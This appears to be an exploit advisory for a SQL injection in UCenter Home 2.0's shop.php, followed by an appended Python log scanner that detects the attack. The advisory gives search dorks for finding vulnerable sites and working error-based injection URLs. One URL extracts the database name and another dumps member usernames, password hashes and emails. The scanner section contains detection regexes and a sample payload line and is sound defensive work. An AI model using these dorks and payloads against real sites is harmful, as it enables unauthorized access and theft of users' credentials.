__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit your DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
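
For defenders, requests of the kind shown above leave a recognizable trace in web-server access logs: a shop.php request whose shopid is not a plain number and carries error-based SQL constructs. The following is an added example, not part of the original advisory, that scans log lines for that trace; the log lines are constructed samples, and treating shopid as always numeric is an assumption inferred from the shopid=253 in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 300
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /shop.php?ac=view&shopid=12' HTTP/1.1" 200 640
"""

# Constructs that appear in the error-based queries shown in the advisory.
MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "floor(rand())": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "concat()": re.compile(r"concat\s*\(", re.I),
    "group by": re.compile(r"group\s+by", re.I),
}
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan(log_text):
    """Return one finding per non-numeric shopid sent to shop.php."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # The advisory names Shop.php, so match the file name case-insensitively.
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs percent-decodes the value before it is inspected.
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumption: a plain numeric id is the only valid form
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            findings.append({"client": client, "shopid": value, "markers": hits,
                             "severity": "high" if hits else "review"})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"], finding["client"], finding["markers"])
```

The same numeric-only rule is the server-side mitigation: rejecting or integer-casting shopid before it reaches the query removes the injection point.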